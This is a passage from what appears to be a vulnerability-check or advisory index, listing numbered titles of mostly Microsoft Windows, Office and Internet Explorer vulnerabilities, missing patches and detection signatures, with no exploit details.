Explorer WPAD information disclosure [38722] Microsoft DirectX DirectShow WAV and AVI code execution [38721] Microsoft DirectX DirectShow SAMI code execution [38716] Microsoft Internet Explorer DHTML object code execution [38715] Microsoft Internet Explorer element tag code execution [38714] Microsoft Internet Explorer cloneNode and nodeValue code execution [38713] Microsoft Internet Explorer ActiveX setExpression code execution [38697] Wireshark SSCOP dissector denial of service vulnerable Windows version detected [38696] Wireshark DHCP dissector denial of service vulnerable Windows version detected [38695] Wireshark IPsec ESP preference parser off-by-one vulnerable Windows version detected [38694] Wireshark SCSI dissector denial of service vulnerable Windows version detected [38693] Wireshark NFS dissector buffer overflow vulnerable Windows version detected [38691] Wireshark SSH dissector denial of service vulnerable Windows version detected [38690] Wireshark Checkpoint FW-1 dissector format string vulnerable Windows version detected [38677] Symantec Backup Exec for Windows Server bengine.exe denial of service [38676] Symantec Backup Exec for Windows Server bengine.exe NULL pointer dereference denial of service [38499] Microsoft Jet Database Engine MDB file buffer overflow [38440] Microsoft Forms ActiveX control denial of service [38434] Novell Client for Windows NWFILTER.SYS privilege escalation [38432] Microsoft SAFRCFileDlg.RASetting ActiveX control buffer overflow [38431] Windows Live Messenger connection detected [38430] Microsoft Office Web Component OWC11.DataSourceControl ActiveX denial of service [38336] Microsoft Internet Explorer DNS same-origin policy security bypass [38324] Microsoft Outlook and Outlook Express URI handling command execution [38292] Microsoft Sysinternals DebugView privilege escalation [37261] Microsoft Internet Explorer .exe file download warning bypass [37236] Microsoft SQL Slammer patch not installed [37230] Microsoft SQL Server MS00-092 patch not installed [37229] Microsoft SQL Server MS02-043 patch not installed [37228] Microsoft SQL Server MS02-034 patch not installed [37223] Microsoft ActiveSync weak XOR encryption [37200] Microsoft SQL Server 2000 Service Pack 1 update is not installed [37198] Microsoft SQL Server 2000 Service Pack 3 update is not installed [37044] Microsoft Expression Media password information disclosure [37035] Microsoft Visual FoxPro FPOLE.OCX ActiveX FoxDoCmd command execution [36982] Windows Live Messenger shared image files buffer overflow [36981] Symantec Veritas Backup Exec client for Windows Servers unspecified [36953] Microsoft DirectX Media SDK traffic detected [36848] Microsoft Internet Explorer OnKeyDown information disclosure [36818] Microsoft Internet Explorer address bar spoofing [36817] Microsoft Internet Explorer script error code execution [36801] Microsoft Word document workspace code execution [36715] Microsoft Internet Security and Acceleration (ISA) Server SOCKS4 information disclosure [36572] Microsoft Visual Studio PDWizard ActiveX control code execution [36571] Microsoft Visual Studio VB To VSI Support Library ActiveX control file overwrite [36562] Microsoft Visual Basic .VBP file buffer overflow [36554] Wireshark NTP dissector format string vulnerable Windows version detected [36553] Wireshark NCP NMAS and NDPS dissector off-by-one vulnerable Windows version detected [36552] Wireshark MOUNT dissector denial of service vulnerable Windows version detected [36550] Wireshark XML dissector format string vulnerable Windows version detected [36549] Wireshark MQ dissector format string vulnerable Windows version detected [36547] Wireshark ANSI MAP dissector format string vulnerable Windows version detected [36546] Wireshark GSM BSSMAP dissector denial of service vulnerable Windows version detected [36537] Microsoft MSN Messenger video request detected [36509] Microsoft SQL Server sqldmo.dll ActiveX buffer overflow [36496] Microsoft Visual FoxPro FPOLE.OCX ActiveX control buffer overflow [36494] Microsoft Internet Explorer saved pages cross-site scripting [36455] HTML Microsoft Agent ActiveX detected [36351] Microsoft Internet Explorer with SeaMonkey command execution [36314] Microsoft MSN Messenger video conversations buffer overflow [36302] XAMPP for Windows unspecified privilege escalation [36128] Microsoft Internet Explorer position:relative HTML style code denial of service [36073] Apple Safari for Windows download weak security [36032] Cisco VPN Client for Windows cvpnd.exe privilege escalation [36029] Cisco VPN Client for Windows Dial-up Networking Interface privilege escalation [36027] Microsoft Internet Explorer ActiveX popup blocker denial of service [36003] Microsoft Internet Explorer Netscape command execution [35974] Microsoft Internet Explorer FTP username and password information disclosure [35970] Microsoft DirectX Media SDK DXSurface.LivePicture.FLashPix.1 (DXTLIPI.DLL) ActiveX control buffer overflow [35855] Microsoft Register Server DLL file denial of service [35815] Microsoft Excel index value attributes code execution [35764] Microsoft Message Queuing Service buffer overflow [35759] Microsoft Internet Explorer pdwizard.ocx code execution [35755] Microsoft Internet Explorer tblinf32.dll code execution [35752] Microsoft Agent ActiveX control buffer overflow [35749] Microsoft Internet Explorer CSS string code execution [35579] Sun Java System Application Server Windows source disclosure [35492] Microsoft DirectX Targa buffer overflow [35455] Microsoft Internet Explorer Zone domain name denial of service [35421] Microsoft Internet Explorer document.open address bar spoofing [35346] Microsoft Internet Explorer FirefoxURL command execution [35315] Microsoft Internet Explorer history.length information disclosure [35217] Microsoft Excel Workspace designation code execution [35215] Microsoft Excel active worksheet code execution [35213] Microsoft Office Web Components DataSourceControl object code execution [35212] Microsoft Office Web Components Spreadsheet object code execution [35210] Microsoft Excel version code execution [35197] Microsoft Internet Information Services URL parser buffer overflow [35195] Microsoft XML Core Services (MSXML) memory request code execution [35182] Microsoft Virtual PC and Virtual Server guest operating system buffer overflow [35163] Microsoft Internet Explorer file: URI information disclosure [35153] Microsoft Internet Explorer FTP implementation information disclosure [35132] Microsoft Excel sheet name buffer overflow [35118] Nessus Windows GUI cross-site scripting [35064] Microsoft MSN Messenger SIP weak security [34989] Microsoft Internet Explorer resource:// information disclosure [34867] Microsoft Internet Explorer IDN authentication dialog spoofing [34849] Microsoft Office MSODataSourceControl ActiveX control buffer overflow [34755] Microsoft Internet Explorer Outlook Express Address Book object denial of service [34754] Microsoft Internet Explorer MSHtmlPopupWindow object denial of service [34720] Microsoft FrontPage Personal Web Server CERN Image Map Dispatcher buffer overflow [34719] Microsoft FrontPage CERN Image Map Dispatcher information disclosure [34705] Microsoft Internet Explorer location URL spoofing [34696] Microsoft Internet Explorer page update cross-domain security bypass [34650] Microsoft Internet Explorer Javascript src attribute denial of service [34639] Microsoft .NET Framework JIT Compiler service buffer overflow [34638] Microsoft .NET Framework NULL byte termination information disclosure [34637] Microsoft .NET Framework PE Loader service buffer overflow [34632] Microsoft Internet Explorer navigation cancel page spoofing [34630] Microsoft Internet Explorer Speech API ActiveX control code execution [34626] Microsoft Internet Explorer uninitialized object code execution [34621] Microsoft Internet Explorer multiple language packs code execution [34619] Microsoft Internet Explorer CSS tag code execution [34610] Microsoft Visio compressed document packaging code execution [34607] Microsoft Visio version number code execution [34600] Microsoft VDT Database Designer VDT70.DLL ActiveX control buffer overflow [34476] Microsoft Visual Basic Company Name buffer overflow [34475] Microsoft Visual Basic project detail buffer overflow [34473] Microsoft Office 2000 ActiveX control buffer overflow [34434] Microsoft IIS Hit-highlighting security bypass [34418] Microsoft Internet Information Server (IIS) AUX/.aspx denial of service [34343] Microsoft SharePoint Server default.aspx PATH_INFO cross-site scripting [33993] VMware Workstation Windows guest debugging unspecified [33978] Microsoft Internet Explorer LF response splitting [33915] Microsoft Excel autofilter code execution [33914] Microsoft Excel placeholder data code execution [33913] Microsoft Excel BIFF file format buffer overflow [33908] Microsoft Office drawing object code execution [33901] Microsoft Word RTF parsing code execution [33899] Microsoft Word function call code execution [33890] Microsoft Exchange IMAP command denial of service [33889] Microsoft Exchange MIME base64 code execution [33888] Microsoft Exchange iCal MODPROPS denial of service [33887] Microsoft Exchange UTF character set cross-site scripting [33715] Microsoft Internet Explorer unspecified JavaScript denial of service [33713] Microsoft Word 2007 multiple unspecified denial of service [33712] Microsoft Word 2007 wwlib.dll buffer overflow [33673] CA ARCserve Backup for Windows detected [33478] Multiple vendor image viewers for Windows BMP buffer overflow [33447] Microsoft security updates not available for version of Microsoft Data Access Components [33446] Microsoft security updates not available for Microsoft Internet Explorer version [33415] Microsoft Internet Explorer JavaScript DNS pinning code execution [33355] Microsoft Internet Explorer msauth.dll code execution [33317] Microsoft Internet Explorer UTF-7 encoded URL cross-site scripting [33265] Microsoft Agent ActiveX control Character.Load() code execution [33256] Microsoft Internet Explorer HTML object freed memory code execution variant [33255] Microsoft Internet Explorer HTML object freed memory code execution [33254] Microsoft Internet Explorer CSS text style code execution [33253] Microsoft Internet Explorer HTML object uninitialized array member code execution [33252] Microsoft Internet Explorer chtskdic.dll COM object code execution [33041] Microsoft Excel XML and XLS file denial of service [33039] Microsoft Office WMF file denial of service [32939] Microsoft Internet Explorer resizeTo denial of service [32907] Microsoft Xbox 360 hypervisor code execution [32906] Microsoft Xbox 360 hypervisor security bypass [32831] Microsoft Internet Explorer BrowseDialog ActiveX control denial of service [32769] Microsoft Publisher .pub file memory validation code execution [32754] Citrix Presentation Server Client for Windows ICA code execution [32739] Microsoft Capicom Certificates ActiveX control code execution [32737] Microsoft Content Management Server (MCMS) HTTP request cross-site scripting [32736] Microsoft Content Management Server (MCMS) HTTP GET code execution [32649] Microsoft Internet Explorer onUnload handler URL spoofing [32647] Microsoft Internet Explorer onUnload handler denial of service [32631] Microsoft SQL Server 2000 Service Pack 2 update is not installed [32503] Microsoft Word document malformed string code execution [32457] Microsoft Internet Explorer getElementById denial of service [32454] Microsoft Visual Studio time functions denial of service [32427] Microsoft Internet Explorer COM ActiveX object code execution [32404] Microsoft Knowledge Base Article 905495 is not installed [32403] Microsoft Knowledge Base Article 905414 is not installed [32178] Microsoft Office Excel malformed record code execution [32106] Microsoft Internet Explorer COM object code execution [32100] Microsoft Internet Explorer FTP response code execution [32097] Microsoft Word drawing object code execution [32096] Microsoft Word macro code execution [32095] Microsoft Internet Explorer COM object code execution [32089] Microsoft Fronpage Extensions directory /_vti_log/ present [32078] Microsoft Fronpage Extensions directory /_vti_bin/ present [32076] Microsoft Frontpage Extensions directory /_vti_pvt/ present [32074] Microsoft IIS iissamples directory present [32020] Fullaspsite Asp Hosting Sitesi windows.asp SQL injection [31914] Telestream Flip4Mac Windows Media Components for QuickTime WMV file code execution [31867] Microsoft Internet Explorer ActiveX multiple properties denial of service [31840] Microsoft Exchange Server detected [31834] Microsoft Word document function code execution [31814] Microsoft Internet Explorer IFRAME file URI denial of service [31675] Microsoft Internet Explorer BrowseDialog ActiveX control denial of service [31665] Microsoft Visual Studio .rc file buffer overflow [31644] Microsoft IIS Web server access.cnf file detected [31643] Microsoft HTML Help Workshop .HPJ files buffer overflow [31642] Microsoft IIS Web server service.cnf file detected [31638] Microsoft IIS Web server svcacl.cnf file detected [31630] Microsoft Internet Information Services IISAdmin directory detected [31555] Microsoft HTML Help Workshop .CNT files buffer overflow [31549] Microsoft Internet Explorer CCRP Folder Treeview ActiveX control denial of service [31358] Microsoft XML Core Services IFRAME code execution [31287] Microsoft Internet Explorer VML record buffer overflow [31284] Adobe Acrobat detected on Windows system [31208] Microsoft Excel Palette record buffer overflow [31207] Microsoft Excel column record buffer overflow [31206] Microsoft Excel string buffer overflow [31205] Microsoft Excel malformed record buffer overflow [31204] Microsoft Excel IMDATA record buffer overflow [31196] Microsoft Office 2003 Brazilian Grammar Checker buffer overflow [31188] Microsoft Outlook Finder.exe .oss file buffer overflow [31187] Microsoft Outlook email long header denial of service [31186] Microsoft Outlook .iCal meeting request VEVENT buffer overflow [31127] Microsoft Antivirus engine pdf buffer overflow [31011] Microsoft Internet Information Services IUSR_Machine command execution [30959] Microsoft Outlook ole32.dll ActiveX denial of service [30905] Microsoft Project Server 2003 pdsrequest.asp information disclosure [30885] Microsoft Word pointer code execution [30806] Microsoft Word data structure code execution [30738] Microsoft Word data string code execution [30712] Novell Client for Windows SRVLOC.SYS component denial of service [30609] Microsoft OLE Dialog component code execution [30603] Microsoft Internet Explorer TIF folder OBJECT tag information disclosure [30602] Microsoft Internet Explorer TIF folder drag and drop information disclosure [30601] Microsoft Internet Explorer DHTML script code execution [30600] Microsoft Internet Explorer script error handling code execution [30596] Microsoft Step-by-Step Interactive Training bookmark link buffer overflow [30220] Microsoft Internet Explorer Phishing Filter active [30168] Microsoft Internet Explorer ieframe.dll certificate spoofing [30004] Microsoft XMLHTTP ActiveX control code execution [29945] Microsoft Agent .ACF file buffer overflow [29915] Microsoft Visual Studio WmiScriptUtils.dll code execution [29860] Microsoft .NET Framework request filtering insecure [29837] Microsoft Internet Explorer ADODB.Connection code execution [29827] Microsoft Internet Explorer Popup Address bar spoofing [29750] Microsoft Active Directory unauthorized login attempt rejected [29749] Microsoft Active Directory security audit setup failed [29748] Microsoft Active Directory security attributes changed [29747] Microsoft Active Directory Security Descriptor Propagator terminated [29746] Microsoft Active Directory addition of replication link success [29745] Microsoft Active Directory addition of replication link failed [29744] Microsoft Active Directory replication connection created [29742] Microsoft Active Directory object operation performed [29741] Microsoft Active Directory outbound replication disabled [29740] Microsoft Active Directory host not global catalog server [29737] Microsoft Active Directory maximum LDAP connections reached [29736] Microsoft Active Directory inbound replication disabled [29735] Microsoft Active Directory calculate security descriptor failed [29733] Microsoft Active Directory write security descriptor failed [29731] Microsoft Active Directory object operation failed [29730] Microsoft Active Directory right grant attempt failed [29729] Microsoft Active Directory domain controller removal failed [29728] Microsoft Active Directory SID inherit attempt failed [29726] Microsoft Active Directory domain removed from enterprise [29725] Microsoft Active Directory database initialization failure [29724] Microsoft Active Directory certificate rejected, not trusted [29722] Microsoft Active Directory certificate replication access rejected [29713] Microsoft Internet Information Server MS01-026 patch is not installed [29680] Microsoft Internet Information Server MS01-044 patch is not installed [29670] Microsoft Internet Explorer 7 is installed [29507] Microsoft Office 2003 unspecified PowerPoint NULL pointer dereference denial of service [29462] ISA Server Windows Out-Of-Band attack detected [29242] Microsoft Excel COLINFO code execution [29239] Microsoft Excel Lotus 1-2-3 file buffer overflow [29238] Microsoft Excel DATETIME buffer overflow [29234] Microsoft PowerPoint bit record code execution [29233] Microsoft PowerPoint data record code execution [29232] Microsoft PowerPoint object pointer code execution [29225] Microsoft PowerPoint unspecified .ppt file code execution [29224] Microsoft Word mail merge file code execution [29216] Microsoft Office Smart Tag code execution [29215] Microsoft Word malformed string code execution [29213] Microsoft Office malformed record code execution [29212] Microsoft Office malformed chart record code execution [29210] Microsoft XML Core Services XLST buffer overflow [29209] Microsoft Office malformed string code execution [29206] Microsoft XML Core Services XMLHTTP information disclosure [29199] Microsoft Internet Explorer layout combinations code execution [29135] Microsoft Internet Explorer CSS HTML INPUT DIV element denial of service [29092] Microsoft Visual Basic msgbox unspecified [29004] Microsoft Internet Explorer VML buffer overflow [28942] Microsoft Internet Explorer DirectAnimation keyframe buffer overflow [28893] Microsoft Internet Explorer HTTP 1.1 compression long URL buffer overflow variant [28775] Microsoft Word unspecified memory corruption code execution [28658] Microsoft ASP.NET Framework HTTP cross-site scripting [28651] Microsoft Indexing Service cross-site scripting [28650] Microsoft Office PICT image filter code execution [28648] Microsoft Publisher .pub file malformed string code execution [28647] Microsoft Office EPS filter code execution [28608] Microsoft Internet Explorer daxctle.ocx denial of service [28559] Proventia Server for Windows is installed [28532] AK-Systems Windows Terminal unauthorized VNC access [28522] Microsoft Internet Explorer HTTP 1.1 compression long URL buffer overflow [28516] Microsoft Internet Explorer multiple COM object color property denial of service [28511] Microsoft Internet Explorer multiple Visual Studio COM object denial of service [28444] Microsoft Internet Explorer tsuserex.dll COM object denial of service [28439] Microsoft Internet Explorer msoe.dll COM object denial of service [28438] Microsoft Internet Explorer chtskdic.dll COM object denial of service [28436] Microsoft Internet Explorer imskdic.dll COM object denial of service [28336] Symantec VERITAS Backup Exec for Windows Server RPC interface buffer overflow [28068] Microsoft Internet Explorer deleted frame access denial of service [28066] Microsoft Internet Explorer ADODB.Recordset ActiveX object denial of service [28046] Microsoft Internet Explorer NDFXArtEffects ActiveX object denial of service [28043] Microsoft Internet Explorer HTML rendering code execution [28042] Microsoft Internet Explorer Window location information disclosure [28040] Microsoft Internet Explorer cross-domain code execution [28039] Microsoft Internet Explorer ActiveX COM object code execution [28037] Microsoft Internet Explorer chained CSS code execution [28034] Microsoft Internet Explorer HTML layout code execution [28025] Microsoft PowerPoint BIFF file format malformed record code execution [28023] Microsoft Visual Basic for Applications (VBA) document property buffer overflow [27932] Microsoft Internet Explorer native function iteration denial of service [27931] Microsoft Internet Explorer Forms.ListBox.1 and Forms.ComboBox.1 ActiveX object denial of service [27930] Microsoft Internet Explorer ASFSourceMediaDescription ActiveX object denial of service [27929] Microsoft Internet Explorer Internet.HHCtrl ActiveX object denial of service [27900] Microsoft Internet Explorer wininet.dll denial of service [27890] Microsoft Internet Explorer href title denial of service [27884] Microsoft Internet Explorer CEnroll ActiveX object denial of service [27854] Microsoft IIS ASP cache virtual server information disclosure [27845] Microsoft Internet Explorer OVCtl ActiveX object denial of service [27833] Microsoft ISA file extension security bypass [27804] Microsoft Internet Explorer WebViewFolderIcon ActiveX object code execution [27803] Microsoft Internet Explorer DataSourceControl ActiveX object denial of service [27795] Microsoft Works wksss.exe denial of service [27794] Microsoft Works wksss.exe buffer overflow [27783] Microsoft PowerPoint powerpnt.exe unspecified vulnerability [27782] Microsoft PowerPoint unspecified memory corruption [27781] Microsoft PowerPoint unspecified mso.dll code execution [27762] Microsoft Internet Explorer DXImageTransform.Microsoft.Gradient ActiveX object denial of service [27761] Microsoft Internet Explorer MHTMLFile ActiveX object denial of service [27760] Microsoft Internet Explorer FolderItem control denial of service [27740] Microsoft PowerPoint mso.dll malformed shape code execution [27713] Microsoft Internet Explorer RevealTrans ActiveX object denial of service [27675] Microsoft Internet Explorer TriEditDocument ActiveX object denial of service [27653] Microsoft Excel Asian language editions Style and Repair buffer overflow [27649] Microsoft Internet Explorer HtmlDlgSafeHelper ActiveX object denial of service [27626] Microsoft Word hlink.dll buffer overflow [27623] Microsoft Internet Explorer Object.Microsoft.DXTFilter ActiveX object denial of service [27622] Microsoft Internet Explorer DirectAnimation.DAUserData ActiveX object denial of service [27621] Microsoft Internet Explorer RDS.DataControl ActiveX object denial of service [27617] Microsoft Office mso.dll LsCreateLine() denial of service [27609] Microsoft Office property field buffer overflow [27607] Microsoft Office string parsing buffer overflow [27604] Microsoft Excel cell rebuilding code execution [27599] Microsoft Internet Explorer OutlookExpress.AddressBook ActiveX object denial of service [27596] Microsoft Internet Explorer ADODB.Recordset ActiveX object denial of service [27592] Microsoft Internet Explorer table.frameset appendChild() denial of service [27573] Microsoft Internet Explorer HTML Help HHCtrl ActiveX control buffer overflow [27565] Microsoft Internet Explorer StructuredGraphicsControl SourceURL denial of service [27558] Microsoft Office PNG buffer overflow [27556] Microsoft Office GIF filter buffer overflow [27550] Novell GroupWise Windows Client API unauthorized email access [27544] Microsoft Office Excel SELECTION buffer overflow [27542] Microsoft Office and Microsoft Works Suite Excel SELECTION buffer overflow [27466] Microsoft Office and Microsoft Works Suite Excel LABEL buffer overflow [27464] Microsoft Office Excel FNGROUPCOUNT buffer overflow [27463] Microsoft Office Excel OBJECT buffer overflow [27456] Microsoft Internet Explorer HTA SMB file share command execution [27452] Microsoft Internet Explorer object.documentElement.outer information disclosure [27450] Microsoft Office Suite Excel COLINFO buffer overflow [27312] Microsoft Excel embedded Shockwave Flash Object code execution [27288] Microsoft Internet Explorer ASCII encoded Web filter bypass [27224] Microsoft Office hlink.dll COM object buffer overflow [27179] Microsoft Excel unspecified code execution [26971] Microsoft NetMeeting unspecified memory corruption denial of service [26817] Microsoft Internet Explorer CSS position denial of service [26810] Microsoft Internet Explorer mhtml://mid URL buffer overflow [26808] Microsoft Internet Explorer HTML tag parsing denial of service [26802] Microsoft ASP.NET Framework App_Code folder information disclosure [26796] Microsoft Internet Information Services (IIS) ASP buffer overflow [26784] Microsoft Powerpoint record buffer overflow [26782] Microsoft Internet Explorer .mht files code execution [26777] Microsoft Internet Explorer Address bar spoofing [26774] Microsoft Internet Explorer DXImageTransform.Microsoft.MMSpecialEffect1Input ActiveX object code execution [26768] Microsoft Internet Explorer DXImageTransform.Microsoft.Light ActiveX control code execution [26766] Microsoft Internet Explorer UTF8 encoded HTML code execution [26762] Microsoft Internet Explorer nested OBJECT tag memory corruption variant [26632] Cisco VPN Client for Windows GUI privilege escalation [26556] Microsoft Word document handling buffer overflow [26340] Microsoft Infotech Storage System Library (itss.dll) CHM file heap corruption [26281] Microsoft Internet Explorer mhtml: URL redirection information disclosure [26233] Microsoft ISA Server log file manipulation [26118] Microsoft Office 2003 mailto: information disclosure [26111] Microsoft Internet Explorer modal security dialog box code execution [26027] Ethereal NetXray/Windows Sniffer buffer overflow [25978] Microsoft Internet Explorer nested OBJECT tag memory corruption [25939] HP StorageWorks Secure Path for Windows denial of service [25852] Microsoft Internet Explorer CSS scrollbar denial of service [25844] Microsoft Dynamics GP magic number denial of service [25843] Microsoft Dynamics GP DPS multiple buffer overflows [25842] Microsoft Dynamics GP DPM multiple buffer overflows [25841] Microsoft Dynamics GP DPS and DPM IP address buffer overflow [25840] Microsoft Dynamics GP DPS and DPM string buffer overflow [25818] Multiple Mozilla products windows.controllers array cross-site scripting [25678] Microsoft Office document string buffer overflow [25634] Microsoft Internet Explorer .swf address bar spoofing [25557] Microsoft Internet Explorer address bar spoofing [25556] Microsoft Exchange calendar attachment buffer overflow [25555] Microsoft Internet Explorer navigation method popup security zone bypass [25552] Microsoft Internet Explorer IOIeClientSite code execution [25551] Microsoft Internet Explorer Double-Byte Character Set code execution [25550] Microsoft Exchange Outlook Web Access cross-site scripting [25547] Microsoft Internet Explorer HTML PRE tag code execution [25545] Microsoft Internet Explorer COM objects as ActiveX code execution [25542] Microsoft Internet Explorer HTML parsing code execution [25537] Microsoft FrontPage Server Extensions HTML cross-site scripting [25439] Microsoft .NET ILDASM buffer overflow [25438] Microsoft .NET ILASM buffer overflow [25394] Microsoft Internet Explorer HTA file execution [25392] Microsoft ASP.NET COM and COM+ w3wp.exe denial of service [25379] Microsoft Internet Explorer createTextRange() code execution [25330] Microsoft Commerce Server 2002 authfiles/login.asp authentication bypass [25292] Microsoft Internet Exporer mshtml.dll buffer overflow [25284] Microsoft Internet Explorer HTML CSS null dereference denial of service [25256] Microsoft Internet Explorer Java VM denial of service [25229] Microsoft Excel graphic buffer overflow [25228] Microsoft Excel record buffer overflow [25227] Microsoft Excel formula size buffer overflow [25225] Microsoft Excel parsing format file buffer overflow [25148] Microsoft Visual Studio and Visual InterDev .dbp and .sln DataProject buffer overflow [25011] Microsoft Internet Explorer display adapter JPEG image denial of service [25009] Microsoft Office routing slip metadata buffer overflow [24923] Microsoft Internet Explorer IsComponentInstalled() buffer overflow [24846] Microsoft Internet Explorer window.status memory leak denial of service [24844] Microsoft .asf file detected [24788] Microsoft Internet Explorer Script Engine stack denial of service [24648] Microsoft Internet Explorer drag and drop event file downloading variant [24629] BlackBerry Enterprise Server Attachment Service Microsoft Word file buffer overflow [24490] Microsoft PowerPoint TIFF information disclosure [24487] Microsoft Internet Explorer WMF image code execution [24481] Microsoft HTML Help Workshop .hhp file buffer overflow [24379] Microsoft Internet Explorer ActiveX kill bit settings can be bypassed [24346] Microsoft Office \BaseNamedObjects\Mso97SharedDg denial of service [24188] Microsoft Visual Studio project.dsp code execution [24162] Microsoft Internet Explorer invalid IMG and XML element denial of service [24116] Microsoft Visual Studio UserControl.Load code execution [24089] Avira Desktop for Windows ACE filename buffer overflow [24061] Symantec Norton SystemWorks NProtect directory is hidden from Windows APIs [23895] Microsoft Internet Explorer HTML denial of service [23706] Microsoft MSN Messenger and Internet Explorer image denial of service [23571] Microsoft Internet Explorer cssText information disclosure [23537] Microsoft Excel msvcrt.memmove() buffer overflow [23451] Microsoft Internet Explorer HTTPS proxy authentication information disclosure [23448] Microsoft Internet Explorer download dialog box code execution [23129] Microsoft Outlook Express news server information disclosure [22878] Microsoft Exchange Server and Outlook TNEF overflow [22852] Microsoft Internet Explorer mshtmled.dll denial of service [22474] Microsoft Internet Explorer colon data manipulation [22472] Microsoft Internet Explorer ActiveX HTTP request injection [22413] Microsoft Internet Explorer for Mac OS about: buffer overflow [22379] Microsoft Internet Explorer Web content controlled cross-site scripting [22338] Microsoft Internet Information Server WebDAV request source code disclosure [22318] Microsoft SQL Server 2000 Service Pack 4 update is not installed [22268] Microsoft Log Sink Class ActiveX pkmcore.dll file manipulation [22183] Microsoft Exchange Server 2003 public folder denial of service [22155] Microsoft Knowledge Base Article 896688 is not installed [22073] Microsoft Knowledge Base Article 903235 is not installed [22072] Microsoft Knowledge Base Article 899587 is not installed [22071] Microsoft Knowledge Base Article 896428 is not installed [22069] Microsoft Knowledge Base Article 890859 is not installed [22068] Microsoft Knowledge Base Article 890046 is not installed [22042] Microsoft Internet Explorer command execution [21955] Microsoft Internet Information Server SERVER_NAME request spoofing [21930] Microsoft Internet Explorer URL restricted zone denial of service [21702] Microsoft Internet Explorer Web Folder Behaviors zone bypass [21701] Microsoft Internet Explorer JPEG image buffer overflow [21660] Microsoft ActiveSync brute force allows attacker to guess equipment IDs [21658] Microsoft ActiveSync multiple request denial of service [21553] Microsoft Internet Explorer AJAX denial of service [21537] Microsoft FrontPage style tag denial of service [21455] MSN (Microsoft Network) Messenger .pif denial of service [21352] Microsoft ASP.NET RCP/encoded denial of service [21315] Microsoft Outlook 2002 connector for Domino bypass restrictions [21307] Microsoft Internet Explorer multiple COM object code execution [21271] Microsoft Word font buffer overflow [21193] Microsoft Internet Explorer javaprxy.dll buffer overflow [21100] Microsoft Internet Explorer popup obtain information [21071] Microsoft Internet Explorer BMP memory denial of service [21025] Microsoft ISA Server SecureNAT client configuration denial of service [20975] Microsoft Internet Explorer allows script code modification [20967] Microsoft Exchange Outlook Web Access cross-site scripting [20843] Microsoft ISA Server Netbios bypass policy [20842] Microsoft ISA Server HTTP header cache poisoning [20831] Microsoft Agent character spoof [20830] Microsoft Outlook Express NNTP Response Parsing buffer overflow [20693] Microsoft ASP.NET Framework SQL injection [20692] Microsoft ASP.NET Framework full path disclosure [20683] Microsoft Word .mcw file buffer overflow [20617] Microsoft Internet Explorer information bar security bypass [20409] Microsoft ASP.NET Framework ViewState replay [20408] Microsoft ASP.NET Framework _VIEWSTATE denial of service [20080] Oracle Forms Query/Where Windows popup SQL injection [20026] Microsoft Outlook and Outlook Web Access email client address spoofing [19950] MSN (Microsoft Network) Messenger GIF image code execution [19914] Microsoft Jet Database msjet40.dll library buffer overflow [19875] Microsoft Knowledge Base Article 893066 is not installed [19842] Microsoft Internet Explorer Content Advisor buffer overflow [19841] Microsoft Internet Explorer URL buffer overflow [19831] Microsoft Internet Explorer DHTML object buffer overflow [19828] Microsoft Word document buffer overflow [19716] Microsoft Office InfoPath form information disclosure [19629] Microsoft Exchange Server 2003 folder denial of service [19461] Microsoft Office applications information disclosure [19452] Microsoft Internet Explorer title bar spoofing [19373] Microsoft Internet Explorer and Outlook Express status bar spoofing [19252] Microsoft Knowledge Base Article 890261 is not installed [19225] Microsoft Outlook Web Access owalogon.asp script URL redirect [19214] Microsoft Internet Explorer file URL encode [19141] Microsoft Knowledge Base Article 867282 is not installed [19137] Microsoft Internet Explorer Channel Definition Format code execution [19133] Microsoft DHTML method buffer overflow [19121] Microsoft Pocket Internet Explorer (PIE) URL Unicode spoofing [19118] Microsoft Knowledge Base Article 890047 is not installed [19117] Microsoft Internet Explorer drag and drop event file downloading [19116] Microsoft Knowledge Base Article 891781 is not installed [19112] Microsoft Knowledge Base Article 873352 is not installed [19111] Microsoft Knowledge Base Article 888113 is not installed [19107] Microsoft Office XP URL buffer overflow [19106] Microsoft Knowledge Base Article 873333 is not installed [19102] Microsoft Knowledge Base Article 885834 is not installed [19095] Microsoft Knowledge Base Article 888302 is not installed [19092] Microsoft Knowledge Base Article 887981 is not installed [19090] Microsoft Knowledge Base Article 885250 is not installed [18944] Microsoft Knowledge Base Article 886185 is not installed [18936] Microsoft Internet Explorer file exisitence [18897] Microsoft Internet Explorer bypass file download warning [18770] Microsoft Knowledge Base Article 890175 is not installed [18769] Microsoft Knowledge Base Article 887219 is not installed [18723] Microsoft Internet Explorer FTP arbitrary file creation [18504] Microsoft Internet Explorer DHTML bypass cross-domain security model [18489] Cisco Unity integrated with Microsoft Exchange has default user accounts [18444] Microsoft Internet Explorer could allow an attaker to bypass popup blocking [18442] Microsoft SharePoint Portal Server could allow an attacker to obtain password [18395] Microsoft Internet Explorer sysimage obtain information [18389] Microsoft Exchange Server SMTP buffer overflow [18388] Microsoft Exchange Server SMTP integer overflow [18311] Microsoft Internet Explorer save file caused by the Related Topics command of the Help ActiveX Control [18269] Microsoft Internet Explorer Save Picture As spoofing [18189] Altiris Deployment Agent for Windows allows elevated privileges [18181] Microsoft Internet Explorer execCommand bypass download warnings [18073] Microsoft Internet Explorer path cookie overwrite [18020] Microsoft Internet Explorer status bar spoofing [17989] Microsoft Internet Explorer open window allows attacker to obtain information [17938] Microsoft Internet Explorer A HREF status bar spoofing [17936] Cisco Secure ACS for Windows and Solution Engine EAP-TLS bypass authentication [17931] Microsoft Internet Explorer mshtml.dll denial of service [17911] Microsoft Internet Explorer FONT tags denial of service [17910] Microsoft Internet Explorer Hhctrl.ocx allows cross-domain script injection [17909] Microsoft Internet Explorer table status bar spoofing [17907] Microsoft ISA Server and Proxy Server Patch MS04-039 is not installed [17906] Microsoft ISA Server and Proxy Server allow Web site spoofing caused by cache reverse lookup results [17889] Microsoft Internet Explorer IFRAME SRC NAME buffer overflow [17868] Microsoft Remote Desktop Tsshutdn command restart [17828] Microsoft Outlook base64 image file bypass security [17826] Microsoft Outlook 2003 CID security bypass [17824] Microsoft Internet Explorer AnchorClick command execution [17820] Microsoft Internet Explorer bypass Drag and Drop or copy and paste files security setting [17746] Microsoft Internet Explorer URL address spoofing [17739] Microsoft FrontPage and Internet Explorer asycpict.dll JPEG denial of service [17683] Microsoft Excel MS04-033 patch is not installed [17656] Microsoft Internet Information Server MS04-030 patch is not installed [17655] Microsoft Internet Explorer plug-in navigation allows address bar spoofing [17654] Microsoft Internet Explorer cache from SSL Web sites obtain information [17653] Microsoft Excel allows code execution [17652] Microsoft Internet Explorer Double Byte Character Set spoof Web site to obtain information [17651] Microsoft Internet Explorer MS04-038 patch is not installed [17650] Microsoft Internet 